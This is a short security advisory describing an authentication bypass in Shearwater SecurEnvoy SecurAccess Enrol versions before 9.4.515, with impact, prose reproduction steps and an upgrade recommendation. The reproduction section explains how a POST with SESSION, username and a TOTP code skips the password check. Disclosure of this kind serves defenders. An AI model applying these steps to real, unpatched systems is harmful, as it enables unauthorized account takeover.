Shearwater SecurEnvoy SecurAccess Enrol TOTP Authentication Bypass Vulnerability

A vulnerability in Shearwater SecurEnvoy SecurAccess Enrol versions prior to 9.4.515 allows authentication by bypassing the password requirement. This is achieved by sending a six-digit Time-based One-Time Password (TOTP) code in an HTTP POST request that includes a SESSION parameter. The application fails to properly validate the authentication state, enabling an unauthenticated attacker to exploit this flaw over the internet.

Impact

Exploitation of this vulnerability allows an attacker to bypass multi-factor authentication, effectively reducing it to single-factor authentication. This can lead to unauthorized access to user accounts, allowing attackers to take control of the user's two-factor authentication, reset passwords, and access sensitive information or functionalities within the application.

Reproduction

To reproduce this vulnerability, send an HTTP POST request to the SecurAccess Enrol application with the SESSION parameter and a valid username. Include a six-digit TOTP code in the PASSCODE parameter. The application will authenticate the user without verifying the password, bypassing the multi-factor authentication requirement.

Remediation

Users are advised to update to SecurEnvoy SecurAccess Enrol version 9.4.515 or later.